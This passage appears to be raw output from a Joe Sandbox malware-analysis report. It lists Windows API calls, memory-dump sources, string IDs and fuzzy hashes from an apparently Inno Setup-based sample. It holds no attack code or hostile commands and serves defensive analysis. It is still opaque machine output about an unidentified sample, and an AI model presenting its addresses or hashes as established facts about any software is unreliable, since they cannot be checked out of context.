                                                                                              • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                                              • Part of subcall function 0042D418: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4A6,?,?,?,00000001,?,0045559A,00000000,00455602), ref: 0042D44D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                            • String ID: .dat$.msg$IMsg$Uninstall
                                                                                            • API String ID: 3312786188-1660910688
                                                                                            • Opcode ID: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                                            • Instruction ID: 58d6af22fd8ad1ff54f71e35ba593e4f31a3bf997598853b00730072561c9efa
                                                                                            • Opcode Fuzzy Hash: 23a76306a6ad414d2dba017a661bccc660dfd398584fab5f483c78eba6c01499
                                                                                            • Instruction Fuzzy Hash: C4319234A006149FCB00FFA5DD5295E7BB5FB48708F51847AF800A73A2CB78AD049B9C
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 00496744
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,$pI,00000000,004967CA,?,?,00000000,0049A628), ref: 0049676D
                                                                                            • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00496786
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Attributes$Move
                                                                                            • String ID: $pI$isRS-%.3u.tmp
                                                                                            • API String ID: 3839737484-4128586672
                                                                                            • Opcode ID: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                            • Instruction ID: 5157d7ee42b340b6017ae31c030909d6195775d38fcd81d7ef1a959590527e8d
                                                                                            • Opcode Fuzzy Hash: ac93eb15cc30df3555ec8ee47a98c48700fec702651561ff72d2a5defb372c3c
                                                                                            • Instruction Fuzzy Hash: B7217371E00209AFCF00EFA9C8919AFBBB8EB44318F11457BB814B72D1D63C9E018A59
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042E94E
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E954
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042E97D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                            • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                            • API String ID: 828529508-2866557904
                                                                                            • Opcode ID: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                            • Instruction ID: 1d35fa7d7a5cedd0232cd267efd28fbcee77054966ca8dd586963fa292d83f31
                                                                                            • Opcode Fuzzy Hash: 215bc1b7bc83ffdf68daf534a2d56b4e30a92487d6c5dc46c4b8b9a3e95a1be6
                                                                                            • Instruction Fuzzy Hash: 58F0C2E134062136E660A67BACC2F6B15CC8F94729F54003BB108EA2C2E96C8945426F
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,00000020), ref: 004534BF
                                                                                              • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 004534E4
                                                                                              • Part of subcall function 00452AFC: GetLastError.KERNEL32(00000000,0045356D,00000005,00000000,004535A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496869,00000000), ref: 00452AFF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$AttributesDeleteErrorLastMove
                                                                                            • String ID: $pI$DeleteFile$MoveFile
                                                                                            • API String ID: 3024442154-1403374609
                                                                                            • Opcode ID: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                            • Instruction ID: 0b1c975e4cad0da58cdf6a339e0cc25f4cbee2301ce5bab719f8a23037a79807
                                                                                            • Opcode Fuzzy Hash: c3ba43a282ab64e4bd7258d017cc9cb201b328cdf06a165d105c793465f640fa
                                                                                            • Instruction Fuzzy Hash: D4F062742141456AEB11FFA6D95266E67ECEB4434BFA0443BF800B76C3DA3C9E094929
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                                            • InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                            • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                            • API String ID: 3478007392-2498399450
                                                                                            • Opcode ID: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                            • Instruction ID: 89e1f457e47db82f9faa956fb130fb356174019ed1a27fb48ec6c883adef8708
                                                                                            • Opcode Fuzzy Hash: 66ed2d7305b3b0eec70b6170d071817c925b739ceb1fb38ca2eb5854fddf3c51
                                                                                            • Instruction Fuzzy Hash: E4E08CA1340310EADA107BA26D8AF1A2654A320715F8C443BF080620E1C7BC0C60C95F
                                                                                            APIs
                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                            • String ID: AllowSetForegroundWindow$user32.dll
                                                                                            • API String ID: 1782028327-3855017861
                                                                                            • Opcode ID: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                            • Instruction ID: 0cf89beef61ef8a76223fb5aa8394d6e95b25c45a6fd57a36df02fca6db0c00c
                                                                                            • Opcode Fuzzy Hash: 23d9d9cc46354639512b471ab02422c9b54f1bfd7ccda73b957914f4bb9bf9af
                                                                                            • Instruction Fuzzy Hash: 79D0A9E0200F0169DD10B3F2AD47EAB329ECE84B10B92843B7408E3182CA3DE8404E3C
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004970B6), ref: 0044EFD3
                                                                                            • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: NotifyWinEvent$dD$user32.dll
                                                                                            • API String ID: 1646373207-754903266
                                                                                            • Opcode ID: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                            • Instruction ID: d2dc615c88fd328006faf79361cd74abdd3d8da8a377be2bcafca06377aa3dce
                                                                                            • Opcode Fuzzy Hash: dc61cc67552be4efe4d14fef26ae15ab6e12dbd37892583342a89fc102010d4c
                                                                                            • Instruction Fuzzy Hash: 37E012F0E41340AEFB00BFFB984271A3AA0B76431CB00007FB40066292CB7C48284A5F
                                                                                            APIs
                                                                                            • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                            • SaveDC.GDI32(?), ref: 00416C93
                                                                                            • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                            • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                            • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                            • String ID:
                                                                                            • API String ID: 3808407030-0
                                                                                            • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                            • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                            • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                            • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                            • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                            • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                            • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                            • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                            • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                            • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                            • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 3850602802-0
                                                                                            • Opcode ID: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                            • Instruction ID: c447c4a9eb68fcc7219df142ffdb21218ba7f26748626b58278b549ffff81a32
                                                                                            • Opcode Fuzzy Hash: 5944dffaa8c0b8b44a765cdc0198bb50be024f609766e5ff2339194419bf2bce
                                                                                            • Instruction Fuzzy Hash: 3321AF707507057AE710BB66CC82F5B76ACEB42708F94043EB541AB2D2DF78ED41825C
                                                                                            APIs
                                                                                            • GetSystemMetrics.USER32(0000000B), ref: 0041BBDA
                                                                                            • GetSystemMetrics.USER32(0000000C), ref: 0041BBE4
                                                                                            • 73A0A570.USER32(00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC22
                                                                                            • 73A16310.GDI32(00000000,?,00000004,?,?,00000000,00000000,0041BD8D,?,00000000,00000001,0000000C,0000000B,?,?), ref: 0041BC69
                                                                                            • DeleteObject.GDI32(00000000), ref: 0041BCAA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: MetricsSystem$A16310A570DeleteObject
                                                                                            • String ID:
                                                                                            • API String ID: 2246927583-0
                                                                                            • Opcode ID: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                            • Instruction ID: d912de8c3c57523408de13a46bdb54385142bc6a2202aaac6113f7462e2bca5d
                                                                                            • Opcode Fuzzy Hash: 5f396e580eed0d8f1a1d4e3bb68adccfbdce92e17c2bbde9fea232aacb1b708e
                                                                                            • Instruction Fuzzy Hash: CE314F74E00209EFDB04DFA5C941AAEB7F5EB48700F11856AF514AB381D7789E40DB98
                                                                                            APIs
                                                                                              • Part of subcall function 0045C76C: SetLastError.KERNEL32(00000057,00000000,0045C838,?,?,?,?,00000000), ref: 0045C7D7
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725E9
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00472630,?,?,0049B178,00000000), ref: 004725FF
                                                                                            Strings
                                                                                            • Failed to set permissions on registry key (%d)., xrefs: 00472610
                                                                                            • Could not set permissions on the registry key because it currently does not exist., xrefs: 004725F3
                                                                                            • Setting permissions on registry key: %s\%s, xrefs: 004725AE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                                                            • API String ID: 1452528299-4018462623
                                                                                            • Opcode ID: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                            • Instruction ID: 4334e49d385bf692f2cc32478bc4a2497c1f2fe716dd62bcd395c3eafaa3e5f2
                                                                                            • Opcode Fuzzy Hash: b6a47f64f510fce16551a7a9453ce12765f8589f174dbaf3fa05134ae08179ca
                                                                                            • Instruction Fuzzy Hash: 9C218370A046445FCB01DBAAD9827EEBBE4EB49314F50817BE408E7392D7B85D05CBA9
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                            • String ID:
                                                                                            • API String ID: 262959230-0
                                                                                            • Opcode ID: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                            • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                                                            • Opcode Fuzzy Hash: 3d91154ea29cb477aba9f2cf37b6340c14ba569e13ff3378e354d6e20d937e44
                                                                                            • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                                                            APIs
                                                                                            • 73A08830.GDI32(00000000,00000000,00000000), ref: 00414429
                                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000000), ref: 00414431
                                                                                            • 73A08830.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414445
                                                                                            • 73A022A0.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0041444B
                                                                                            • 73A0A480.USER32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00414456
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A022A08830$A480
                                                                                            • String ID:
                                                                                            • API String ID: 3036329673-0
                                                                                            • Opcode ID: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                            • Instruction ID: 307ee49d89b37f6f535ee678b6e17b633f9af621dfcf88cb872c79a1e2d754b8
                                                                                            • Opcode Fuzzy Hash: 161378f607458cb0647fc0ae293b672cc47cdd04cd22de7490c53bd54400d8e0
                                                                                            • Instruction Fuzzy Hash: A901D47121C3406AD200B63D8C45B9F6BEC8FC6314F05546EF494D7382C97ACC018765
                                                                                            APIs
                                                                                            • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 0040700B
                                                                                            • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 00407085
                                                                                            • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Enum$NameOpenResourceUniversal
                                                                                            • String ID: Z
                                                                                            • API String ID: 3604996873-1505515367
                                                                                            • Opcode ID: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                            • Instruction ID: 2d8f00a968b5306eb49df96258ffff6df6a72a1db963417fd4edcb7bb2ad48f8
                                                                                            • Opcode Fuzzy Hash: 9cf142189d4ecfc6757bb5486cc46db394a4e60b729a9f9f9915b5c39fe8e999
                                                                                            • Instruction Fuzzy Hash: C1513070E04208ABDB15DF55CD41A9EBBB9FB49304F1041BAE910BB3D1C778AE458F5A
                                                                                            APIs
                                                                                            • SetRectEmpty.USER32(?), ref: 0044C8A2
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044C8CD
                                                                                            • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044C955
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DrawText$EmptyRect
                                                                                            • String ID:
                                                                                            • API String ID: 182455014-2867612384
